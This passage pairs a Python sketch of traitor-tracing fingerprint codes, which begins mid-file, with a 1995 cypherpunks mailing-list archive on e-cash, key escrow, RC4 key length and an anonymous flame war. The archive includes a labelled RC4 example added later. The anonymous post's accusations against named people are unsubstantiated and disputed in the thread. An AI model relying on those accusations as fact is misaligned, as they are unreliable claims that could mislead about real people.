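SECRET = b"constructed-distributor-key"  # constructed sample key, known only to the distributor
RECIPIENTS = ["alice", "bob", "carol", "dave",
              "erin", "frank", "grace", "heidi"]  # constructed recipient list


def codeword(recipient, sites=SITES):
    """ID bits for one recipient: bit i selects variant 0 or 1 at site i."""
    bits, counter = [], 0
    while len(bits) < sites:
        msg = f"{recipient}:{counter}".encode()
        for byte in hmac.new(SECRET, msg, hashlib.sha256).digest():
            bits.extend((byte >> k) & 1 for k in range(8))
        counter += 1
    return bits[:sites]


def collude(copies):
    """Model of the 'diff': colluders only see sites where their copies differ.

    At each visible site they keep one of their own variants (an arbitrary
    pick); sites where all their copies agree look like ordinary text and
    survive untouched. Returns (leaked_copy, visible_site_indexes).
    """
    leaked, visible = [], []
    for i, variants in enumerate(zip(*copies)):
        if len(set(variants)) > 1:
            visible.append(i)
            leaked.append(variants[i % len(copies)])
        else:
            leaked.append(variants[0])
    return leaked, visible


def trace(leaked, recipients, z=5.0):
    """Score every recipient by agreement with the recovered copy.

    An uninvolved recipient agrees at about half the sites (binomial,
    standard deviation sqrt(n)/2); anyone more than z deviations above
    that is accused.
    """
    n = len(leaked)
    threshold = n / 2 + z * (n ** 0.5) / 2
    scores = {r: sum(a == b for a, b in zip(codeword(r, n), leaked))
              for r in recipients}
    accused = sorted(r for r, s in scores.items() if s > threshold)
    return accused, scores, threshold


def demo(colluders=("alice", "bob")):
    """Two recipients diff their copies, leak the merge, distributor traces it."""
    leaked, visible = collude([codeword(c) for c in colluders])
    accused, scores, threshold = trace(leaked, RECIPIENTS)
    return accused, len(visible), scores, threshold


if __name__ == "__main__":
    accused, n_visible, scores, threshold = demo()
    print(f"sites the colluders could see: {n_visible} of {SITES}")
    print(f"accusation threshold: {threshold:.1f}")
    for name, score in sorted(scores.items(), key=lambda kv: -kv[1]):
        print(f"  {name:6s} {score}")
    print("accused:", accused)
```

Each additional colluder shrinks the set of sites on which all their copies agree, which is why the number of marked sites has to grow with the size of the coalition the distributor wants to survive.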



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ethan Lindsey <karlmarx@ix.netcom.com>
Date: Mon, 11 Sep 95 00:43:04 PDT
To: cypherpunks@toad.com
Subject: Voice Encryption
Message-ID: <199509110742.AAA17689@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


 A friend of mine recently told me that Phil Zimmerman was distributing a voice
encryption program over the 'net. I dismissed his comment thinking he was probably 
just confused and thinking about PGP. Lately though, I've been wondering if he was 
right. Does anyone know of any voice cryptology program that encrypts voice through 
a modem connection? Thanx...

ethan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Sat, 9 Sep 95 22:31:29 PDT
To: list ecash <e-cash@nptn.org>
Subject: Brand e-cash implementation?
Message-ID: <Pine.PMDF.3.91.950910012952.541131339B-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Have there been any implementations, even as trials, of Brands' protocols?
Do any ecash systems on the drawing board even include real user anonymity?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (soon to move to its real home): http://www.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Sat, 9 Sep 95 22:33:22 PDT
To: list ecash <cypherpunks@toad.com>
Subject: Dishonest banks & ecash
Message-ID: <Pine.PMDF.3.91.950910013128.541131339C-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I've been doing some ecash reading.  The threat model is the dishonest 
user or 3rd party who tries to mint the stuff.  Any work been done on the 
problem of the dishonest bank (a la Bcci) that tries to mint the stuff?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (soon to move to its real home): http://www.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 10 Sep 95 02:10:05 PDT
To: cypherpunks@toad.com
Subject: PGP in UK
Message-ID: <199509100908.CAA23542@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I heard something rather disturbing the other day from someone I do
business with.  I've been telling this company for 18 months or so
about the advantages of PGP and email rather than faxes, and they
finally tried it, liked it, and decided to use it a month or so ago.
Last week they got a visit from the Department of Trade and Industry
and MI5 (or is it MI6?) telling them to stop using PGP or they might
find difficulties getting export licences for their products in
future.  The visitors wouldn't say how they knew this company had
been using it.
The person who told me about this also said something about a
Department of Trade & Industry paper which mentioned that the British
Government was going to insist on key escrow for encryption.  I had
hoped to get a copy of this, but he can't find it at the moment.
I'll post the text when I get it if anyone's interested.

Anyone else in the UK heard anything about this?

- -- B.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Sat, 9 Sep 95 22:13:09 PDT
To: cypherpunks@toad.com
Subject: Re: not a flame please read and think about this
Message-ID: <199509100245.EAA09943@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



i know this is unpopular but i wish someone would respond to the points
rather than flaming me. pat farrel is the only one of you with the balz
to try to defend himself instead of attacking me. and you attack me for
being anon. i love it. cypherpunks yea right.

more of the indefensible. ive been keeping a list:

janet renos cypherpunk heros:

wei dai patents algorithms - for microsoft!!!!. that should
fucking help us a lot. whos he gonna sue first?

hey i think ill patent xor!!!! and give the patent to the nsa!!!

according to sci.crypt mat blaze can prove that clipper has no back
door. right. that sure helps us. david sternlights new hero.

pat farrel signs up with the nsa to make the key escrow rules easier
for us morons to understand. hey thanks. maybe theyll give you a
nicer room in the concentration kamp.

a whole shitload of socalled cypherpunks jumping over each other to help and
defend him.

brian davis tries to convince us that key escrow isnt so bad (who signs your paycheck davie?????)

that guy from rand corp tells us words of wisdom from robert morris the nsa guy
as if we should write them down and pray three times a day to them.

carl elison designs key escrow for tis and acts like hes one of us.

bruce schneier is copyrighting crypt programs and
threatening to sue people who use it.

even phil zimmerman is selling the rights to pgp. what about all the people who contributed code (like me). not a dime for us because phil is famous
and your not allowed to say anything bad about him. sorry i forgot phil is god.
no one dares to complain. ask phil about me and when i asked about sharing
profits from the code i contributed. also about the deal with
r.f...

by the way i am not the anonymous-remailer@shell.portal.com person who
told farel to shut up. that was someone else. i dont think anyone should
shut up.
thats my point. i think we should talk about this in the open.
got it perry???


lets get back to being punks. fuck these traitors. do crypto and fuck the nsa.

an116512@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan Pugh" <Alan Pugh@MAILSRV2.PCY.MCI.NET>
Date: Sun, 10 Sep 95 01:54:29 PDT
To: cypherpunks@toad.com
Subject: Re: Certificates/Anonymity/Policy/True Names
Message-ID: <01HV3KI1816A8ZH61F@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


> What about when the CA signing key is stolen, factored, or otherwise falls  
> into the wrong hands, thereby possibly making every signature made by the CA  
> worthless, or at least questionable?
> 
> I assume liability will be based on the CA's efforts to ensure the integrity  
> of the signatures it makes (and therefore the confidentiality of the secret  
> key components), but what constitutes due diligence?  As we all know,  
> security measures cover a very wide range and can reach ridiculous  
> proportions on both ends of the spectrum...  How much security will be  
> 'enough' from a legal standpoint...?

an excellent point, and one that i'd not seriously considered until i saw 
your post. given today's legal climate, assuring the confidentiality of 
a ca's key would be pretty expensive. i suppose burning cd-roms with all 
transactions would help to document all transactions, but would not be 
definitive as far as the signatures go. any document signed with the key 
would really have to be considered valid if the signature itself is to 
really mean anything in a legal sense. if one were to allege that a 
signature is not valid, even though it checked out cryptologically, how 
could one defend against a charge that the secret key had been 
compromised. you cannot prove a negative. obviously, ianal, but i would 
think it would be reasonably easy to convince at least one jury member 
that there is a reasonable doubt that the key had been compromised.

then again, it might be similar to a claim that a signature has been 
forged.

i think there could be a danger of allowing the confidence in a given 
piece of crypto to unduly influence a jury of a document's authenticity 
when the key _had_ been compromised. the 'gee whiz' factor could be fairly 
significant among juries. given statements like 'you could take all the 
computers on the planet and let them crunch on it for a billion years 
would be needed', a jury might miss issues of security.

fwiw, my 2 cents...

          *********************************************
          *          / Only God can see the whole     *
          *  O[%\%\%{<>===========================-   *
          *          \ Mandlebrot Set at Once!        *
          * amp                                       *
          * <0003701548@mcimail.com>                  *
          * <alan.pugh@internetmci.com>               *
          *********************************************
Key fingerprint =  A7 97 70 0F E2 5B 95 7C  DB 7C 2B BF 0F E1 69 1D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan Pugh" <Alan Pugh@MAILSRV2.PCY.MCI.NET>
Date: Sun, 10 Sep 95 02:14:20 PDT
To: cypherpunks@toad.com
Subject: remailers
Message-ID: <01HV3L6O9GWI8ZH626@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


where can i find a good 'how to' faq on anonymous remailers?

i've looked around and found several documents that tell me what they are, 
but no good information on how to use the various remailers.

pointers are appreciated.
          *********************************************
          *          / Only God can see the whole     *
          *  O[%\%\%{<>===========================-   *
          *          \ Mandlebrot Set at Once!        *
          * amp                                       *
          * <0003701548@mcimail.com>                  *
          * <alan.pugh@internetmci.com>               *
          *********************************************
Key fingerprint =  A7 97 70 0F E2 5B 95 7C  DB 7C 2B BF 0F E1 69 1D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Sun, 10 Sep 95 07:52:10 PDT
To: cypherpunks@toad.com
Subject: RSA lcensing costs?
Message-ID: <199509101443.HAA04907@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam, 

I called RSA last week to get information on licensing Diffie-Hellman
for a videoconferencing application.  They said that "They provide
the BSAFE development toolkit, but don't license the technology" and
gave me the number of PKP to license the technology itself.  I called
a Mr. Fougmer at PKP, (408 735-5893), his message says that he'll be
out of town until the 18th of September, and if you want to leave a
message, call back after that date.

Now, I could be completely confused, it wouldn't be the first (or
even the 100th) time.  If you can get a standard license by using
the BSAFE toolkit, and they had a standard price for that, well,
I didn't give Linda De Los Reyes at RSA (415 595-8782) a chance
to tell me that.

thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-8624




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Sun, 10 Sep 95 08:12:45 PDT
To: cypherpunks@toad.com
Subject: 64 bit crypto
Message-ID: <199509101504.IAA04932@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



Say that we wanted to use 80 bit RC4 for our crypto application, but we were
only allowed to use 64 bit crypto because we lived in some police state that
enforced its wishes.   Couldn't we modify RC4 easily to provide the same
security against brute-force attacks by just running the key-setup phase
65536 times instead of just once?  That would slow down the key-setup (on
my machine) from 50,000 per second to just over 1 second, but so what?  It
takes ATT more than 1 second to set up a long distance call, I can wait
another second to start the conversation.

If our breaking of 40 bit RC4 was a one, then this 64 bit RC4-modified would
be a 109,951,162,776, well beyond possibilities that I can imagine.  You might
say that you could save all 2^64 key tables, but that is a huge amount of data,
millions of terabyte-capacity tapes.

In the GAK proceedings, I have never heard of any limitation on the algorithm,
just that it be public and 64 bits or less.  And, of course, have GAK.  Of
course, it wouldn't surprise me for this kind of technical fix to be
immediately outlawed by the aforementioned police state.


thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-8624
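
One reading of the proposal above, as an added example that is not code from the original post: the standard RC4 key schedule with its mixing pass repeated `rounds` times over the same state, plus the brute-force cost it implies. Carrying `j` across passes and the helper names `ksa`, `attack_cost_bits` and `relative_cost` are assumptions of this sketch.

```python
import math
import time


def ksa(key, rounds=1):
    """RC4 key setup; rounds=1 is standard RC4, larger values repeat the pass."""
    if not 1 <= len(key) <= 256:
        raise ValueError("RC4 keys are 1..256 bytes")
    s = list(range(256))
    j = 0
    for _ in range(rounds):
        for i in range(256):
            j = (j + s[i] + key[i % len(key)]) & 0xFF
            s[i], s[j] = s[j], s[i]
    return s


def keystream(state, n):
    """Standard RC4 output generation over a copy of the prepared state."""
    s = state[:]
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4(key, data, rounds=1):
    """Encrypt or decrypt (same operation) with an optionally stretched setup."""
    ks = keystream(ksa(key, rounds), len(data))
    return bytes(a ^ b for a, b in zip(data, ks))


def attack_cost_bits(key_bits, rounds):
    """log2 of the key-setup passes an exhaustive key search has to run."""
    return key_bits + math.log2(rounds)


def relative_cost(key_bits, rounds, baseline_bits=40):
    """Search cost relative to single-pass RC4 with a baseline_bits key."""
    return rounds * 2 ** (key_bits - baseline_bits)


if __name__ == "__main__":
    key = bytes(range(8))  # constructed 64-bit sample key
    start = time.perf_counter()
    ksa(key, rounds=1024)
    per_pass = (time.perf_counter() - start) / 1024
    print(f"one pass: {per_pass * 1e6:.0f} us, 65536 passes: {per_pass * 65536:.2f} s")
    print("search cost:", attack_cost_bits(64, 65536), "bits")
    print("relative to 40-bit single-pass RC4: 2**40 =", relative_cost(64, 65536))
```

The repeated setup multiplies the cost of every guess, but the number of distinct keys is still 2^64, which is why the precomputed-table objection in the message is the relevant limit.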




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 10 Sep 95 09:43:35 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks Purity Test
Message-ID: <ac785d1601021004ddb4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



It seems that none of us are "pure enough" for Anonymous.

In the real world, and in the world of crypto experts, programmers, and
legal folks, people have real jobs. Sometimes with Microsoft, sometimes
with AT&T, sometimes with the Justice Department.

To exclude them from our discussions because they are not pure enough and
have not done as Anonymous has (who may actually be working for anyone, of
course), is self-defeating. By working for Microsoft, Justice, or TPC,
they can probably do more for "the cause" (in its many dimensions and
facets) than some warez-junkie living with his parents can.

Specifically,

At 2:45 AM 9/10/95, Anonymous wrote:

>wei dai patents algorithms - for microsoft!!!!. that should
>fucking help us a lot. whos he gonna sue first?

Wei Dai's work is impressive...I'm not surprised Microsoft hired him for
the summer. Patents are a way of life. They may not always be, and
different people have different views on them, but meaningless insults like
this are a waste of our time.

>according to sci.crypt mat blaze can prove that clipper has no back
>door. right. that sure helps us. david sternlights new hero.

If Anonymous believes this claim by Sternlight, he didn't read the rest of
the discussion and he knows as much about crypto as Sternlight does. Matt
Blaze made a much more finely-nuanced point about this (I wasn't at the
Crypto meeting, but read his comments in sci.crypt, and they directly
dispute this point by Anonymous.)


>pat farrel signs up with the nsa to make the key escrow rules easier
>for us morons to understand. hey thanks. maybe theyll give you a
>nicer room in the concentration kamp.

Pat Farrell and several other members of our list attended the NIST key
escrow meeting. I would have also if I lived near D.C. Is silence the only
acceptable behavior at such meetings? Perhaps Anonymous feels that even
_attending_ such a meeting is disgraceful? Most of us disagree.

>
>a whole shitload of socalled cypherpunks jumping over each other to help and
>defend him.

They "defended" him in the sense that they questioned the motives (and
perhaps the emotional age) of Mr. Anonymous. We on this list have had a
long interest in key escrow, dating back to the first weeks of this list's
existence, and 6 months prior to the public disclosure of Clipper. Much
discussion of key escrow in various forms (Clipper, SKE, CKE, GAK) has
occurred, and even lists of changes/improvements have been made.


>brian davis tries to convince us that key escrow isnt so bad (who signs
>your paycheck davie?????)
>

I recall Brian Davis asking a well-formed question about whether our
objections to key escrow would be lessened under various circumstances. A
perfectly reasonable thing to do. Several of us responded. What this list
is for.

>that guy from rand corp tells us words of wisdom from robert morris the nsa guy
>as if we should write them down and pray three times a day to them.
>

??? This one escapes me. Robert Morris Sr. has written many interesting
things. That he worked for, or still works for, the NSA is no reason to
ignore what he has said.

Anonymous would probably be thrown into an apoplexy were he to learn that
more than one current Cypherpunk actually worked for the NSA.

>carl elison designs key escrow for tis and acts like hes one of us.
>

He _is_ one of us. His work on commercial key escrow (CKE) is not
inherently bad. After all, there are many legitimate reasons people and
corporations would _choose_ (emphasis on "choose") to split keys, store
them with trusted agents, etc. CKE, if done right, may be the way many of
us protect ourselves, from loss of keys in various circumstances. Even
protect ourselves from having to give keys to others (imagine offshore CKE
depositories which have instructions on under what circumstances they will
comply....).

I ask Anonymous, is it better that an active researcher and developer of CKE
be on this list, or that we cast him out (as if we could) and continue in
ignorance?

>bruce schneier is copyrighting crypt programs and
>threatening to sue people who use it.
>

Like it or not, copyrights and patents are the way things are now being
done. It sometimes takes having a patent portfolio before one can "trade"
with those having other patents. Longterm, this will likely change (crypto
anarchy and all that), but for now....

I'm not going to defend software patents, but insults like this, for
someone who has worked so hard on crypto education, are uncalled for.


>even phil zimmerman is selling the rights to pgp. what about all the
>people who contributed code (like me). not a dime for us because phil is
>famous
>and your not allowed to say anything bad about him. sorry i forgot phil is god.
>no one dares to complain. ask phil about me and when i asked about sharing
>profits from the code i contributed. also about the deal with
>r.f...

Now we know that Anonymous is actually a plant from the One Worlders!
Insulting Saint Phil is too much.


>lets get back to being punks. fuck these traitors. do crypto and fuck the nsa.
>

Articulate words. Or, as Anonymous would put it:


"fuck this noyze. get back to hacking commodore 64 warez. crypto rulez, d00d!"


Amazing what the cloak of Anonymity brings out in people. Almost enough for
me to start to believe the doubters of anonymity, the skeptics. But, with
good filtering (and especially with positive reputation filtering), no big
deal to send Anonymous to the oblivion he so richly deserves.

I've written a lot in my time on this list, and no doubt Anonymous will
find many items he thinks prove I am working for the NSA, or Chobetsu, or
am an agent for the Beast. So be it.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 10 Sep 95 07:14:46 PDT
To: cypherpunks@toad.com
Subject: PGP in UK and GAK
Message-ID: <199509101414.KAA09600@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by anonymous-remailer@shell.portal.com () on 
Sun, 10 Sep  2:8  AM

[Snip]

>The person who told me about this also said something 
>about a  Department of Trade & Industry paper which 
>mentioned that the British  Government was going to 
>insist on key escrow for encryption.
>
>Anyone else in the UK heard anything about this?


   Picking up the possible mandated use of key escrow in the
   UK:

   There was chat at the NIST key escrow meeting that low-bit
   key escrow may be the global policy in the works among
   governments. With a blanket outlawing of all non-escrowed
   systems. And, that US key escrow and 64-bit export policy
   is a harbinger of domestic regulation.

   A fed at the B-2 breakout session imperiously barked the
   mantra chanted by several feds at the general meeting, "64-
   bit encryption is what industry asked for, why are you now
   complaining."

   To the counter-question, "what industry are you referring
   to?" the answer was always just "industry."

   The USG's latest key escrow policy, the NIST meetings and
   the Intellectual Cryptography Institute's conference "Global
   Challenges" posted here may be the surfacing of a well-
   orchestrated government and "industry" collusion on this
   issue. Note the common ever-present attendees of both NIST
   and the ICI meetings.

   Certainly, some "industry" spokespersons like "Daughter of
   Clipper" Denning presume by their tone of writing that key
   escrow is on its way to supremacy, with only quibbling left
   on the criteria for acceptably "competitive" variations.

   The NIST handouts of industry players seem to bear this out
   as well, even as some join the public kibitzing. Perhaps
   their raz, and that of BSA, is just a diverting smokescreen
   to induce complacency -- or squeaking wheels to get USG
   attention for sweetheart contracts.

   Maybe they've already met privately with USG reps to get
   rewarded with a piece of the PGP/non-escrow clamp-down biz
   -- more venerable suckling of national security kabooty as
   advised by smart-varmints like ex-NSA Mr. Stewart
   Abercrombie Baker, Every-meet-attending-Esq.

   I wonder if Mrs. Denning and Mr. Baker are advising their
   sweating crypto clients, "if you can't beat 'em, join 'em,
   the international escrow train is leaving the station,
   better get on before it's too late."

   While fretting of derailment by hackers, or worse, by
   international security agencies paranoid of gov-biz
   complicity to take over the "if you knew what I knew"
   crypto-protected cornucopia.

   Wonder who's really engineering this GAK Limited runaway?

   Does anybody know David Kahn well enough to ask what he's
   finding as NSA Visiting Historian -- in the archives and in
   the job-insecure-spook resumes heat-seeking crypto fires?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 10 Sep 95 08:52:33 PDT
To: Anonymous <anon-remailer@utopia.hacktic.nl>
Subject: Re: If this thread didn't start with a flame then I'm ...
In-Reply-To: <199509100245.EAA09943@utopia.hacktic.nl>
Message-ID: <Pine.D-G.3.91.950910115011.8871C-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Sep 1995, Anonymous wrote:

> 
> i know this is unpopular but i wish someone would respond to the points
> rather than flaming me. pat farrel is the only one of you with the balz
> to try to defend himself instead of attacking me. and you attack me for
> being anon. i love it. cypherpunks yea right.
> ... 
> 
> brian davis tries to convince us that key escrow isnt so bad (who signs your paycheck davie?????)
> 
> an116512@anon.penet.fi
> 
An:

You flamed me several months ago, essentially for being a govt flunky in 
the boonies.  You didn't respond to my last post on the topic ...

Many of us (apparently) have trouble with flames originating from "the 
great and powerful Oz" who may be, in fact, a nonachiever hiding behind a 
curtain.  I guess we need Toto to pull away your curtain of privacy!

If you don't like diverse viewpoints, either persuade this list's owner to 
change his charter or start your own list.  Then maybe *I'll* start 
posting anonymously.

You also misread the purpose of my post re MKE.  The purpose was for me 
to get a sense whether some number of Cypherpunks might agree to some 
form of MKE (i.e. would some kind of protection that the government might 
accept, also be acceptable to most/some on the list).  I received a 
number of thoughtful and thought provoking replies.  I was expecting your 
flame, but I see you decided to use your blunderbuss rather than a rifle.

And you are, of course, correct.  Make no attempt to understand your 
enemy.  Stand your ground regardless.  No tactical retreats, no overall 
strategy.

Was this from Sun Tzu?

EBD

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame way! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 10 Sep 95 12:13:27 PDT
To: cypherpunks@toad.com
Subject: Re:  Brand e-cash implementation?
Message-ID: <199509101912.MAA07700@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Brands has a web page at <URL:http://www.cwi.nl/~brands>.  I don't know
of any implementations of his technology.  The last time I heard from him
was early this year and at that time he apparently was still looking for
backers.

BTW he has a new paper out as of July 95, available above, which
discusses some problems and attacks on some earlier papers.  He had
proposed a notion called "secret key certificates" in which some
problems have been found.  Basically a secret key certificate is just
like a public key certificate (a signature by someone on a public key
as in PGP) except that realistic-looking but ultimately worthless
secret key certificates can be faked up (simulated) by anyone.  No one
can distinguish a fake secret key certificate from a real one.
However, they are worthless because the faking process requires you to
choose a random public key, and you can't figure out what the secret
key is.

Brands has (re)expressed his digital cash technology in terms of these
secret key certificates.  But Berry Schoenmakers of CWI has shown a way
in which a faked-up secret key certificate can be used to spend a coin
which was never withdrawn.  However, to do so, you have to go through
the withdrawal protocol in a particular incorrect way.  You force the
bank to act as an "oracle" for a certain discrete log problem when you
do the withdrawal.  The data you get from the incorrect withdrawal
protocol allows you to spend the fake coin.

So this is not actually a dangerous attack, because you in effect have to
withdraw a coin in order to spend the fake one.  You can't make any money
from it.  Still it was not anticipated and that is a bit worrisome.  I'm
not sure why Brands' various proofs of correctness (which are one of the
big selling points of his technology) did not anticipate this attack.

(In effect this is a different form of a blind signature than what
Brands planned for, since you withdraw one thing and get another.  I was
thinking Brands should write this up under the title "Unanticipated
Blinding for Signatures", a pun on Chaum's "Blinding for Unanticipated
Signatures", one of his credential papers.)

Brands has a workaround to prevent this attack, but it hurts the
provability of his scheme.  "A rigorous prove [sic] of the effectiveness
of the measure may be hard to provide, though, since one must hereto
prove that the CA cannot be used as an oracle to perform the
cryptographic action in the showing protocol with respect to simulated
public keys."  So this may be a setback in Brands' attempts to get his
thesis finished and accepted.

As for the question of whether any digital cash scheme offers "true"
anonymity, I think you have to be more specific.  Virtually all cash
advocates will claim that they can offer this.  In the debate I had
earlier with Lucky Green I argued that Chaum's ecash does offer a certain
kind of anonymity.  The extent to which it does not is largely not
technical but a product of not allowing anonymous bank accounts.  With
anonymous accounts Chaum's technology offers as much anonymity as any
system that I have studied.

There is one technical problem with Chaum's ecash which Lucky mentioned,
but I believe it applies to all systems.  That is that the spender of the
cash can "mark" it or at least recognize it when it is later deposited.
If the spender wanted to attack the receiver of the money and it is
deposited non-anonymously then this will be a problem.

However, as we discussed here several months ago, Chaum's paper
"Transferred Cash Grows in Size" from a recent Crypto proceedings shows
that by colluding with the bank a payor of cash can recognize it at any
later stage of the payment chain.  So this kind of anonymity is very hard
to achieve.  Chaum's paper applied to off-line cash, though, so perhaps
an online system could do it.  But you'd have to blind the coins twice,
once when they pass from bank to payor and once when they go from payor
to payee, and I don't see how to do this.

Hal Finney




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 10 Sep 95 09:34:06 PDT
To: cypherpunks@toad.com
Subject: Re: Sigh Re: not a flame please read and think about this
In-Reply-To: <199509092006.NAA05181@jobe.shell.portal.com>
Message-ID: <199509101633.MAA11214@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



anonymous-imbecile@shell.portal.com writes, among other things:
> Then shut up.

It's wonderful to see lots of anonymous remailers, but sometimes one
wonders at the people that use them. I can understand, though, why
many people don't have the cojones to make themselves look like
hydrocephalic jerks in public.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rwm132@psu.edu (Ryan Matlock)
Date: Sun, 10 Sep 95 09:50:26 PDT
To: Cypherpunks@toad.com
Subject: mailing list
Message-ID: <199509101650.MAA46410@r02n06.cac.psu.edu>
MIME-Version: 1.0
Content-Type: text/plain


can you put me and Catch 22 on your mailing list?  got any good philes philes?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 10 Sep 95 10:45:55 PDT
To: Joel McNamara <joelm@eskimo.com>
Subject: Re: Bizdos citizenship?
In-Reply-To: <199509100434.VAA10595@mail.eskimo.com>
Message-ID: <199509101745.NAA11319@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Joel McNamara writes:
> In correspondence with someone outside the US regarding ITAR
> regulations, the remark was made that Jim Bizdos was Greek and not a
> U.S. citizen.  Is this statement in the same class as an Elvis
> sighting?  Or if it is true, what impact would ITAR have on foreign
> nationals working for a US company involved with export restricted crypto?

Yes, it's true. It's meaningless because he's a U.S. Person, and that's
all that counts for the ITARs.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 10 Sep 95 10:47:35 PDT
To: cypherpunks@toad.com
Subject: Re: not a flame please read and think about this
In-Reply-To: <199509100245.EAA09943@utopia.hacktic.nl>
Message-ID: <199509101747.NAA11327@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
> i know this is unpopular but i wish someone would respond the the points
> rather than flaming me.

I'm afraid that you're basically an anonymous jerk and that I
personally have no interest in responding to you. Post under your own
name if you want more than bile.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: damion.furi@the-matrix.com (DAMION FURI)
Date: Sun, 10 Sep 95 13:11:24 PDT
To: cypherpunks@toad.com
Subject: not a flame please re
In-Reply-To: <8B0D11D.000504E7BF.uuout@the-matrix.com>
Message-ID: <8B0D375.000504E8F1.uuout@the-matrix.com>
MIME-Version: 1.0
Content-Type: text/plain



A|i know this is unpopular but i wish someone would respond the the points

        You're going out of your way to be an asshole and you're
        surprised that you're being attacked?

        If you don't want to be flamed, turn off the flamethrower,
        shut down the bulldozer, and use a reasonable tone.

 |rather than flaming me. pat farrel is the only one of you with the balz
 |to try to defend himself insead of attacking me. and you attack me for
 |being anon. i love it. cypherpunks yea right.

        Anonymous doesn't mean anything except that you don't have
        the "balz" to stand up for the beliefs you're espousing.

A|wei dai patents algorithms - for microsoft!!!!. that should
 |fucking help us a lot. whos he gonna sue first?

        If the patents aren't valid, they won't stick.  What are
        you bitching about?

A|according to sci.crypt mat blaze can prove that clipper has no back
 |door. right. that sure helps us. david sternlights new hero.

        Maybe it doesn't.  Not that it matters.  The only reasonable
        working assumption for Clipper (or anything like it) is that
        it _does_ have at least one back door and that it will be
        abused.  What's new about this?  Again, what are you bitching
        about?  Sternlight's an idiot, use your head.

A|pat farrel signs up with the nsa to make the key escrow rules easier
 |for us morons to understand. hey thanks. maybe theyll give you a
 |nicer room in the concentration kamp.

        <shrug>  I'm not going to participate in an escrow no
        matter how easily the rules are understood.  I'm not
        going to participate for any reason.  But I can feel
        that way without jumping down Farrell's throat over
        it.  After all, he's not my spokesman.

A|a whole shitload of socalled cypherpunks jumping over each other to help and
 |defend him.

        That's not what I saw.  I saw a whole shitload of cypherpunks
